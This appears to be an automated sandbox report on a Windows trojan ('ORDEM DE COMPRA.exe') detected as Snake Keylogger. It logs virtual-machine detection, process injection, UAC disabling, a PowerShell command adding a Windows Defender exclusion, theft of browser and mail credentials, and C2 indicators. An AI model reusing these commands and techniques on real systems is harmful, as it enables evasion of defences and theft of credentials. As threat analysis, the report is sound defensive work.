              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595578Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595469Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595359Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595250Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595141Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595016Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594891Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594780Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594344Jump to behavior
              Source: Amcache.hve.9.drBinary or memory string: VMware
              Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.9.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
              Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
              Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
              Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: AddInProcess32.exe, 00000005.00000002.4522243099.00000000011C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: Amcache.hve.9.drBinary or memory string: vmci.sys
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
              Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
              Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
              Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.9.drBinary or memory string: VMware20,1
              Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
              Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A6BE28 LdrInitializeThunk,5_2_06A6BE28
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -ForceJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 422000Jump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 424000Jump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: FB5008Jump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -ForceJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"Jump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeQueries volume information: C:\Users\user\Desktop\ORDEM DE COMPRA.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Disables UAC (registry)
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
              Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
              Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

              barindex
              Yara detected Snake Keylogger
              Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4523823205.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ORDEM DE COMPRA.exe PID: 1756, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 6976, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ORDEM DE COMPRA.exe PID: 1756, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 6976, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Snake Keylogger
              Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4523823205.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ORDEM DE COMPRA.exe PID: 1756, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 6976, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              DLL Side-Loading              		211
              Process Injection              		21
              Disable or Modify Tools              		1
              OS Credential Dumping              		121
              Security Software Discovery              		Remote Services1
              Email Collection              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading              		41
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop Protocol11
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
              Process Injection              		Security Account Manager41
              Virtualization/Sandbox Evasion              		SMB/Windows Admin Shares1
              Data from Local System              		2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
              Obfuscated Files or Information              		LSA Secrets1
              System Network Configuration Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Timestomp              		Cached Domain Credentials1
              File and Directory Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSync13
              System Information Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446502 Sample: ORDEM DE COMPRA.exe Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 23 reallyfreegeoip.org 2->23 25 checkip.dyndns.org 2->25 27 3 other IPs or domains 2->27 33 Multi AV Scanner detection for domain / URL 2->33 35 Found malware configuration 2->35 37 Malicious sample detected (through community Yara rule) 2->37 41 10 other signatures 2->41 8 ORDEM DE COMPRA.exe 1 3 2->8         started        signatures3 39 Tries to detect the country of the analysis system (by using the IP) 23->39 process4 signatures5 43 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->43 45 Writes to foreign memory regions 8->45 47 Adds a directory exclusion to Windows Defender 8->47 49 2 other signatures 8->49 11 AddInProcess32.exe 15 2 8->11         started        15 powershell.exe 23 8->15         started        17 WerFault.exe 19 16 8->17         started        19 2 other processes 8->19 process6 dnsIp7 29 scratchdreams.tk 188.114.97.3, 443, 49700, 49702 CLOUDFLARENETUS European Union 11->29 31 checkip.dyndns.com 132.226.8.169, 49699, 49704, 49709 UTMEMUS United States 11->31 51 Tries to steal Mail credentials (via file / registry access) 11->51 53 Tries to harvest and steal browser information (history, passwords, etc) 11->53 55 Loading BitLocker PowerShell Module 15->55 21 conhost.exe 15->21         started        signatures8 process9

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              ORDEM DE COMPRA.exe26%VirustotalBrowse
              ORDEM DE COMPRA.exe21%ReversingLabsWin64.Trojan.Generic
              ORDEM DE COMPRA.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              reallyfreegeoip.org2%VirustotalBrowse
              scratchdreams.tk18%VirustotalBrowse
              checkip.dyndns.com0%VirustotalBrowse
              15.164.165.52.in-addr.arpa1%VirustotalBrowse
              checkip.dyndns.org0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://checkip.dyndns.org/0%URL Reputationsafe
              http://checkip.dyndns.org/q0%URL Reputationsafe
              http://reallyfreegeoip.org0%URL Reputationsafe
              https://reallyfreegeoip.org0%URL Reputationsafe
              http://upx.sf.net0%URL Reputationsafe
              http://checkip.dyndns.org0%URL Reputationsafe
              http://www.microsoft.0%URL Reputationsafe
              http://checkip.dyndns.com0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/8.46.123.175$0%Avira URL Cloudsafe
              https://reallyfreegeoip.org/xml/8.46.123.1750%Avira URL Cloudsafe
              https://scratchdreams.tk100%Avira URL Cloudmalware
              http://www.microsoft.00%Avira URL Cloudsafe
              https://scratchdreams.tk/_send_.php?TS100%Avira URL Cloudmalware
              http://scratchdreams.tk100%Avira URL Cloudmalware
              https://scratchdreams.tk/_send_.php?TS16%VirustotalBrowse
              http://scratchdreams.tk18%VirustotalBrowse
